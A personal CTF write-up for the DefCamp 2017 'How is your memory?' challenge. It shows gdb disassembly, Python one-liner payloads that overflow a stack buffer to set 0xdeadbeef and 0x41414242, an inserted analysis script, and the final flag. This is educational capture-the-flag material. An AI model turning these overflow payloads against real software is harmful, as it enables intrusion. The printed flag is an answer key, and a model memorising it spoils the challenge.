Trying my first Write Up
I've been busy lately with the job-offer ceremony and my graduation research and haven't managed to do anything, so here is my first write-up!!
This is a write-up for a challenge from DefCamp CTF Qualification 2017, which I took part in with my team the other day.
How is your memory?
Downloading the file from the challenge gave me memory.pcap.
Since it was a pcap I opened it in Wireshark, where the string ELF caught my eye, so I checked with file:
$ file memory.pcap
memory.pcap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ffa14db28a5fdf190ee6b0b56af2c7b2cab9cdd5, not stripped
It was an ELF...
Let's run it right away.
$ ./memory.pcap
Oh well you do remember your extension!
[You have sent this msg]:
[Instead of 0xdeadbeef the target recived]: 0x4030201
With no input it looked like this.
Next, let's try giving it some input.
./memory.pcap
AAAAAAAAAAA
Oh well you do remember your extension!
[You have sent this msg]: AAAAAAAAAAA
[Instead of 0xdeadbeef the target recived]: 0x4030201
The value I entered was echoed back.
Let's enter even more.
$ ./memory.pcap
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oh well you do remember your extension!
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Instead of 0xdeadbeef the target recived]: 0x41414141
Hey hey do not spam! Go home you are drunk!
What used to be 0x4030201 has become 0x41414141; in other words, the value was overwritten by my input.
Next, let's analyze what's inside.
$ gdb -q ./memory.pcap
Reading symbols from ./memory.pcap...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
0x080486bb <+0>: lea ecx,[esp+0x4]
0x080486bf <+4>: and esp,0xfffffff0
0x080486c2 <+7>: push DWORD PTR [ecx-0x4]
0x080486c5 <+10>: push ebp
0x080486c6 <+11>: mov ebp,esp
0x080486c8 <+13>: push ecx
0x080486c9 <+14>: sub esp,0x64
0x080486cc <+17>: mov DWORD PTR [ebp-0xc],0x4030201
0x080486d3 <+24>: mov eax,ds:0x804a040
0x080486d8 <+29>: sub esp,0x4
0x080486db <+32>: push eax
0x080486dc <+33>: push 0x2d
0x080486de <+35>: lea eax,[ebp-0x34]
0x080486e1 <+38>: push eax
0x080486e2 <+39>: call 0x80484f0 <fgets@plt>
0x080486e7 <+44>: add esp,0x10
0x080486ea <+47>: sub esp,0xc
0x080486ed <+50>: push 0x8048950
0x080486f2 <+55>: call 0x8048540 <puts@plt>
0x080486f7 <+60>: add esp,0x10
0x080486fa <+63>: sub esp,0x8
0x080486fd <+66>: lea eax,[ebp-0x34]
0x08048700 <+69>: push eax
0x08048701 <+70>: push 0x804897c
0x08048706 <+75>: call 0x8048530 <printf@plt>
0x0804870b <+80>: add esp,0x10
0x0804870e <+83>: sub esp,0x8
0x08048711 <+86>: push DWORD PTR [ebp-0xc]
0x08048714 <+89>: push 0x804899c
0x08048719 <+94>: call 0x8048530 <printf@plt>
0x0804871e <+99>: add esp,0x10
0x08048721 <+102>: cmp DWORD PTR [ebp-0xc],0x4030201
0x08048728 <+109>: je 0x8048743 <main+136>
0x0804872a <+111>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x08048731 <+118>: je 0x8048743 <main+136>
0x08048733 <+120>: sub esp,0xc
0x08048736 <+123>: push 0x80489cc
0x0804873b <+128>: call 0x8048540 <puts@plt>
0x08048740 <+133>: add esp,0x10
0x08048743 <+136>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x0804874a <+143>: jne 0x8048865 <main+426>
0x08048750 <+149>: sub esp,0xc
0x08048753 <+152>: push 0x80489fc
0x08048758 <+157>: call 0x8048530 <printf@plt>
0x0804875d <+162>: add esp,0x10
0x08048760 <+165>: mov DWORD PTR [ebp-0xc],0xffffff
0x08048767 <+172>: sub esp,0x8
0x0804876a <+175>: lea eax,[ebp-0x34]
0x0804876d <+178>: push eax
0x0804876e <+179>: push 0x8048a64
0x08048773 <+184>: call 0x8048520 <scanf@plt>
0x08048778 <+189>: add esp,0x10
0x0804877b <+192>: sub esp,0x8
0x0804877e <+195>: lea eax,[ebp-0x34]
0x08048781 <+198>: push eax
0x08048782 <+199>: push 0x804897c
0x08048787 <+204>: call 0x8048530 <printf@plt>
0x0804878c <+209>: add esp,0x10
0x0804878f <+212>: sub esp,0x8
0x08048792 <+215>: push DWORD PTR [ebp-0xc]
0x08048795 <+218>: push 0x8048a68
0x0804879a <+223>: call 0x8048530 <printf@plt>
0x0804879f <+228>: add esp,0x10
0x080487a2 <+231>: cmp DWORD PTR [ebp-0xc],0xffffff
0x080487a9 <+238>: je 0x80487c4 <main+265>
0x080487ab <+240>: cmp DWORD PTR [ebp-0xc],0x41414242
0x080487b2 <+247>: je 0x80487c4 <main+265>
0x080487b4 <+249>: sub esp,0xc
0x080487b7 <+252>: push 0x80489cc
0x080487bc <+257>: call 0x8048540 <puts@plt>
0x080487c1 <+262>: add esp,0x10
0x080487c4 <+265>: cmp DWORD PTR [ebp-0xc],0x41414242
0x080487cb <+272>: jne 0x8048865 <main+426>
0x080487d1 <+278>: mov DWORD PTR [ebp-0x3e],0x33736461
0x080487d8 <+285>: mov DWORD PTR [ebp-0x3a],0x73647177
0x080487df <+292>: mov WORD PTR [ebp-0x36],0x78
0x080487e5 <+298>: mov DWORD PTR [ebp-0x43],0x46544344
0x080487ec <+305>: mov BYTE PTR [ebp-0x3f],0x0
0x080487f0 <+309>: mov DWORD PTR [ebp-0x47],0x414853
0x080487f7 <+316>: mov DWORD PTR [ebp-0x4b],0x363532
0x080487fe <+323>: mov DWORD PTR [ebp-0x5b],0x2168654d
0x08048805 <+330>: mov DWORD PTR [ebp-0x57],0x756f5920
0x0804880c <+337>: mov DWORD PTR [ebp-0x53],0x61676120
0x08048813 <+344>: mov DWORD PTR [ebp-0x4f],0x3f6e69
0x0804881a <+351>: sub esp,0xc
0x0804881d <+354>: push 0x8048a98
0x08048822 <+359>: call 0x8048540 <puts@plt>
0x08048827 <+364>: add esp,0x10
0x0804882a <+367>: sub esp,0x4
0x0804882d <+370>: push 0x8048ac3
0x08048832 <+375>: lea eax,[ebp-0x4b]
0x08048835 <+378>: push eax
0x08048836 <+379>: lea eax,[ebp-0x43]
0x08048839 <+382>: push eax
0x0804883a <+383>: push 0x8048ad1
0x0804883f <+388>: lea eax,[ebp-0x3e]
0x08048842 <+391>: push eax
0x08048843 <+392>: push 0x8048ad8
0x08048848 <+397>: lea eax,[ebp-0x3e]
0x0804884b <+400>: push eax
0x0804884c <+401>: lea eax,[ebp-0x4b]
0x0804884f <+404>: push eax
0x08048850 <+405>: lea eax,[ebp-0x47]
0x08048853 <+408>: push eax
0x08048854 <+409>: lea eax,[ebp-0x43]
0x08048857 <+412>: push eax
0x08048858 <+413>: push 0x8048adb
0x0804885d <+418>: call 0x8048530 <printf@plt>
0x08048862 <+423>: add esp,0x30
0x08048865 <+426>: mov eax,0x0
0x0804886a <+431>: mov ecx,DWORD PTR [ebp-0x4]
0x0804886d <+434>: leave
0x0804886e <+435>: lea esp,[ecx-0x4]
0x08048871 <+438>: ret
Looking at this part: when [ebp-0xc] has been overwritten and its value is not 0xdeadbeef, the program prints "Hey hey do not spam! Go home you are drunk!", so overwriting it with 0xdeadbeef should get us past this check.
0x08048721 <+102>: cmp DWORD PTR [ebp-0xc],0x4030201
0x08048728 <+109>: je 0x8048743 <main+136>
0x0804872a <+111>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x08048731 <+118>: je 0x8048743 <main+136>
0x08048733 <+120>: sub esp,0xc
0x08048736 <+123>: push 0x80489cc
0x0804873b <+128>: call 0x8048540 <puts@plt>
0x08048740 <+133>: add esp,0x10
0x08048743 <+136>: cmp DWORD PTR [ebp-0xc],0xdeadbeef
0x0804874a <+143>: jne 0x8048865 <main+426>
Let's try it.
$ python -c 'print("A"*40 + "\xef\xbe\xad\xde")' | ./memory.pcap
Oh well you do remember your extension!
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���
[Instead of 0x41414242 the target recived]: 0xffffff
Rewriting it to 0xdeadbeef worked.
Next, it looks like we just need to rewrite 0xffffff to 0x41414242 the same way.
$ python -c 'print("A"*40 + "\xef\xbe\xad\xde" + "A"*40 + "\x42\x42\x41\x41")' | ./memory.pcap
Oh well you do remember your extension!
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAA
[Instead of 0x41414242 the target recived]: 0x41414242
Wow I am impressed! Now for the last time: DCTF{SHA256(ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration)}
Something that looks like the flag came out.
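To double-check two things the disassembly shows, here is an added Python script of my own (not code from the write-up or the challenge): it replays the immediate stores at +278 through +344 into a little-endian stack model to recover the strings the final printf uses, and it computes how many bytes of the DWORD at [ebp-0xc] the fgets call (buffer at [ebp-0x34], size 0x2d) can reach. Offsets come straight from the listing; bytes the listing never stores are modeled as zero, which is an assumption.

```python
import re

# Constructed sample: the stack-string stores copied from the disassembly (+278..+344).
STORES = """
mov DWORD PTR [ebp-0x3e],0x33736461
mov DWORD PTR [ebp-0x3a],0x73647177
mov WORD PTR [ebp-0x36],0x78
mov DWORD PTR [ebp-0x43],0x46544344
mov BYTE PTR [ebp-0x3f],0x0
mov DWORD PTR [ebp-0x47],0x414853
mov DWORD PTR [ebp-0x4b],0x363532
mov DWORD PTR [ebp-0x5b],0x2168654d
mov DWORD PTR [ebp-0x57],0x756f5920
mov DWORD PTR [ebp-0x53],0x61676120
mov DWORD PTR [ebp-0x4f],0x3f6e69
"""

WIDTH = {"BYTE": 1, "WORD": 2, "DWORD": 4}
STORE_RE = re.compile(r"mov (BYTE|WORD|DWORD) PTR \[ebp-0x([0-9a-f]+)\],0x([0-9a-f]+)")

def build_stack(listing):
    """Replay each immediate store into a map of ebp-relative offset -> byte.
    x86 is little-endian: the lowest byte lands at the lowest address, i.e. the largest offset."""
    mem = {}
    for kind, off, imm in STORE_RE.findall(listing):
        base = int(off, 16)
        for i, b in enumerate(int(imm, 16).to_bytes(WIDTH[kind], "little")):
            mem[base - i] = b
    return mem

def read_cstring(mem, off):
    """Read the NUL-terminated string starting at [ebp-off]; unset bytes read as 0 (assumption)."""
    out = bytearray()
    while mem.get(off, 0) != 0:
        out.append(mem[off])
        off -= 1  # next byte lives at a higher address, i.e. a smaller offset below ebp
    return out.decode("ascii")

def overflow_reach(buf_off, size, target_off):
    """fgets(buf, size, stream) stores at most size-1 input bytes into [ebp-buf_off].
    Return how many of the 4 bytes of the DWORD at [ebp-target_off] that input can cover."""
    distance = buf_off - target_off  # bytes from the start of the buffer to the target
    return max(0, min((size - 1) - distance, 4))

if __name__ == "__main__":
    mem = build_stack(STORES)
    for off in (0x3e, 0x43, 0x47, 0x4b, 0x5b):
        print(f"[ebp-0x{off:x}] = {read_cstring(mem, off)!r}")
    print("bytes of [ebp-0xc] reachable via fgets(buf, 0x2d):", overflow_reach(0x34, 0x2d, 0xc))
    print("bytes reachable if the size were 0x29:", overflow_reach(0x34, 0x29, 0xc))
```

With size 0x2d the input covers all four bytes of [ebp-0xc], which is exactly why 40 A's plus 4 bytes overwrite it; a size of 0x29 (distance + 1) would keep fgets inside the buffer.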
echo -n "ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration" | sha256sum
Since the format was DCTF{SHA256}, the output of this command is the flag.
DCTF{33886bb08d43834495866481148c60bbf9b58421d1dd4849865e49fe444366c6}
It's been just about a month since I started doing CTF seriously, but everyone on the team is amazing, so I want to catch up quickly...
We enter a competition as a team every week, so I plan to write more!!!
Bye!